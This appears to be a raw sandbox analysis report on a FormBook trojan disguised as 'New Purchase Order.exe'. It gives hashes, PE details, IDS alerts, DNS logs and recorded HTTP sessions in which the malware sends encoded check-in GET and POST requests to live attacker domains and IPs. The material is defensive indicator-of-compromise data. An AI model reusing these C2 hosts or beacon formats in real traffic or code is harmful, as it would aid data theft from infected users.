                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                | Source | Detection | Scanner | Label |
                |---|---|---|---|
                | http://www.taxiquynhonnew.click | 0% | Avira URL Cloud | safe |
                | https://l3filejson4dvd.josyliving.com/favicon.ico | 0% | Avira URL Cloud | safe |
                | http://www.taxiquynhonnew.click/y49d/ | 100% | Avira URL Cloud | malware |
                | https://dq0ib5xlct7tw.cloudfront.net/ | 0% | Avira URL Cloud | safe |
                | http://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==&afo=JnyH0Z2 | 100% | Avira URL Cloud | malware |
                | http://www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2 | 0% | Avira URL Cloud | safe |
                | https://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkM | 100% | Avira URL Cloud | malware |
                | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                |---|---|---|---|---|---|
                | www.expancz.top | 107.155.56.30 | true | true | | unknown |
                | dns.ladipage.com | 54.179.173.60 | true | false | | high |
                | s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high |
                | www.070001325.xyz | 161.97.142.144 | true | true | | unknown |
                | www.epitomize.shop | unknown | unknown | false | | unknown |
                | www.taxiquynhonnew.click | unknown | unknown | false | | unknown |
                | Name | Malicious | Antivirus Detection | Reputation |
                |---|---|---|---|
                | http://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==&afo=JnyH0Z2 | true | Avira URL Cloud: malware | unknown |
                | http://www.taxiquynhonnew.click/y49d/ | true | Avira URL Cloud: malware | unknown |
                | http://www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2 | true | Avira URL Cloud: safe | unknown |
                | Name | Source | Malicious | Antivirus Detection | Reputation |
                |---|---|---|---|---|
                | https://ac.ecosia.org/autocomplete?q= | tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
                | https://duckduckgo.com/chrome_newtab | tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
                | https://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkM | tzutil.exe, 00000008.00000002.2616065129.0000000003978000.00000004.10000000.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002C78000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
                | https://l3filejson4dvd.josyliving.com/favicon.ico | tzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
                | https://duckduckgo.com/ac/?q= | tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
                | https://www.google.com/images/branding/product/ico/googleg_lodp.ico | tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
                | https://connect.facebook.net/en_US/fbevents.js | tzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmp | false | | high |
                | https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
                | https://s.yimg.com/wi/ytc.js | tzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmp | false | | high |
                | https://login.live.c | tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmp | false | | high |
                | https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
                | http://localhost/arkanoid_server/requests.php | New Purchase Order.exe, 00000000.00000002.1397890145.00000000029D9000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                | https://analytics.tiktok.com/i18n/pixel/events.js | tzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmp | false | | high |
                | https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
                | https://dq0ib5xlct7tw.cloudfront.net/ | snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
                | https://www.ecosia.org/newtab/ | tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
                | https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
                | http://www.taxiquynhonnew.click | snpURZzZKgO.exe, 00000009.00000002.2611954893.0000000000854000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
                | IP | Domain | Country | ASN | ASN Name | Malicious |
                |---|---|---|---|---|---|
                | 161.97.142.144 | www.070001325.xyz | United States | 51167 | CONTABODE | true |
                | 107.155.56.30 | www.expancz.top | United States | 135377 | UHGL-AS-APUCloudHKHoldingsGroupLimitedHK | true |
                | 54.179.173.60 | dns.ladipage.com | United States | 16509 | AMAZON-02US | false |
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1567394
                                                        Start date and time:2024-12-03 14:14:47 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 1s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:11
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:New Purchase Order.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@7/2@5/3
                                                        EGA Information:
                                                        • Successful, ratio: 75%
                                                        HCA Information:
                                                        • Successful, ratio: 89%
                                                        • Number of executed functions: 100
                                                        • Number of non-executed functions: 284
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes were analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • VT rate limit hit for: New Purchase Order.exe
                                                        Time | Type | Description
                                                        08:15:41 | API Interceptor | 1x Sleep call for process: New Purchase Order.exe modified
                                                        08:17:15 | API Interceptor | 80587x Sleep call for process: tzutil.exe modified
                                                        Process:C:\Users\user\Desktop\New Purchase Order.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.34331486778365
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                        Process:C:\Windows\SysWOW64\tzutil.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1221538113908904
                                                        Encrypted:false
                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                        MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                        SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                        SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                        SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.773475439043074
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:New Purchase Order.exe
                                                        File size:811'008 bytes
                                                        MD5:c4a4fd2e695f61cefcf6bacd76fd91e5
                                                        SHA1:1d9d9b3ab5151310db4a828d329e28b77536e28c
                                                        SHA256:750c0b5cd8ecc25f79e725e1184401806154c3d4880cfabdc3641040a21798d6
                                                        SHA512:0d1c200ff5da82dbd7a3d91289af5822799cceea0e6445ed1fd4c8ab3b0d27f1d9b93d48ab06509b6b26cc7bd2ddbd5cc88936eeb6035355b3f92a9045d87c28
                                                        SSDEEP:12288:j1IR4R52J+XtT8F24kL2sBe8CuZXJKIucVqHhPOqg1hiLJhqYQAQ72AIBglqJxYh:j1IeebGVXKHRYizqYQARBI
                                                        TLSH:7D05F19C3501F05FC903C5714EB1FDB4AA586DAF970792039ADB5EEFB82D8978D041A2
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v.Ng..............0......P.......+... ...@....@.. ....................................@................................
                                                        Icon Hash:033424c4c199d839
                                                        Entrypoint:0x4c2bfe
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x674EA776 [Tue Dec 3 06:38:46 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc2bb0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x4ca8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xca000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc0c04 | 0xc0e00 | 5eb64391e3c16d1a9cf1fc957163cd99 | False | 0.9086917226992871 | data | 7.774994729207274 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc4000 | 0x4ca8 | 0x4e00 | 0574891037e884a0bab8937a67ceb5c2 | False | 0.9410556891025641 | data | 7.76896575786762 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xca000 | 0xc | 0x200 | 39c5af404b7051ac451c0d46fad1b43c | False | 0.041015625 | data | 0.07763316234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc4130 | 0x46f9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9932852661126094
RT_GROUP_ICON | 0xc882c | 0x14 | data | | | 1.05
RT_VERSION | 0xc8840 | 0x278 | data | | | 0.4699367088607595
RT_MANIFEST | 0xc8ab8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-03T14:16:54.314122+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49870 | 161.97.142.144 | 80 | TCP
2024-12-03T14:16:54.314122+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 49870 | 161.97.142.144 | 80 | TCP
2024-12-03T14:17:12.093744+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49910 | 107.155.56.30 | 80 | TCP
2024-12-03T14:17:14.770065+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49917 | 107.155.56.30 | 80 | TCP
2024-12-03T14:17:17.437644+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49923 | 107.155.56.30 | 80 | TCP
2024-12-03T14:17:20.238916+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49930 | 107.155.56.30 | 80 | TCP
2024-12-03T14:17:20.238916+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 49930 | 107.155.56.30 | 80 | TCP
2024-12-03T14:17:27.781273+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49948 | 54.179.173.60 | 80 | TCP
2024-12-03T14:17:30.453326+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49956 | 54.179.173.60 | 80 | TCP
2024-12-03T14:17:33.191667+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49962 | 54.179.173.60 | 80 | TCP
2024-12-03T14:17:35.999511+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49968 | 54.179.173.60 | 80 | TCP
2024-12-03T14:17:35.999511+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 49968 | 54.179.173.60 | 80 | TCP

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2024 14:16:52.356800079 CET | 192.168.2.9 | 1.1.1.1 | 0xee1b | Standard query (0) | www.070001325.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:17:09.365068913 CET | 192.168.2.9 | 1.1.1.1 | 0x82f3 | Standard query (0) | www.expancz.top | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:17:10.359600067 CET | 192.168.2.9 | 1.1.1.1 | 0x82f3 | Standard query (0) | www.expancz.top | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:17:25.253561974 CET | 192.168.2.9 | 1.1.1.1 | 0xacc | Standard query (0) | www.taxiquynhonnew.click | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:17:41.019948959 CET | 192.168.2.9 | 1.1.1.1 | 0x712 | Standard query (0) | www.epitomize.shop | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 14:15:37.301800966 CET | 1.1.1.1 | 192.168.2.9 | 0x60c0 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:15:37.301800966 CET | 1.1.1.1 | 192.168.2.9 | 0x60c0 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:15:37.301887035 CET | 1.1.1.1 | 192.168.2.9 | 0x60c0 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:15:37.301887035 CET | 1.1.1.1 | 192.168.2.9 | 0x60c0 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:16:52.886044025 CET | 1.1.1.1 | 192.168.2.9 | 0xee1b | No error (0) | www.070001325.xyz | | 161.97.142.144 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:17:10.452529907 CET | 1.1.1.1 | 192.168.2.9 | 0x82f3 | No error (0) | www.expancz.top | | 107.155.56.30 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:17:10.591386080 CET | 1.1.1.1 | 192.168.2.9 | 0x82f3 | No error (0) | www.expancz.top | | 107.155.56.30 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:17:26.132348061 CET | 1.1.1.1 | 192.168.2.9 | 0xacc | No error (0) | www.taxiquynhonnew.click | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:17:26.132348061 CET | 1.1.1.1 | 192.168.2.9 | 0xacc | No error (0) | dns.ladipage.com | | 54.179.173.60 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:17:26.132348061 CET | 1.1.1.1 | 192.168.2.9 | 0xacc | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:17:26.132348061 CET | 1.1.1.1 | 192.168.2.9 | 0xacc | No error (0) | dns.ladipage.com | | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:17:41.238794088 CET | 1.1.1.1 | 192.168.2.9 | 0x712 | Name error (3) | www.epitomize.shop | none | none | A (IP address) | IN (0x0001) | false

                                                        • www.070001325.xyz
                                                        • www.expancz.top
                                                        • www.taxiquynhonnew.click

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49870 | 161.97.142.144 | 80 | 5828 | C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe

Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:16:53.021856070 CET | 535 | OUT | GET /gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.070001325.xyz
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 3, 2024 14:16:54.313868046 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Tue, 03 Dec 2024 13:16:54 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 2966
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        ETag: "66cce1df-b96"
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Dec 3, 2024 14:16:54.313904047 CET | 1236 | IN |
                                                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
Dec 3, 2024 14:16:54.313916922 CET | 698 | IN |
                                                        Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        1 | 192.168.2.9 | 49910 | 107.155.56.30 | 80 | 5828 | C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:17:10.592150927 CET | 796 | OUT | POST /2gcl/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.expancz.top
                                                        Origin: http://www.expancz.top
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 194
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.expancz.top/2gcl/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Data Ascii: INvlf=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLTC1nfwqw+6JF1O0hsrSbm0bRl6xD
                                                        Dec 3, 2024 14:17:12.207675934 CET | 697 | IN | HTTP/1.1 405 Not Allowed
                                                        Server: nginx
                                                        Date: Tue, 03 Dec 2024 13:17:11 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 552
                                                        Connection: close
                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        2 | 192.168.2.9 | 49917 | 107.155.56.30 | 80 | 5828 | C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:17:13.249386072 CET | 820 | OUT | POST /2gcl/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.expancz.top
                                                        Origin: http://www.expancz.top
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 218
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.expancz.top/2gcl/
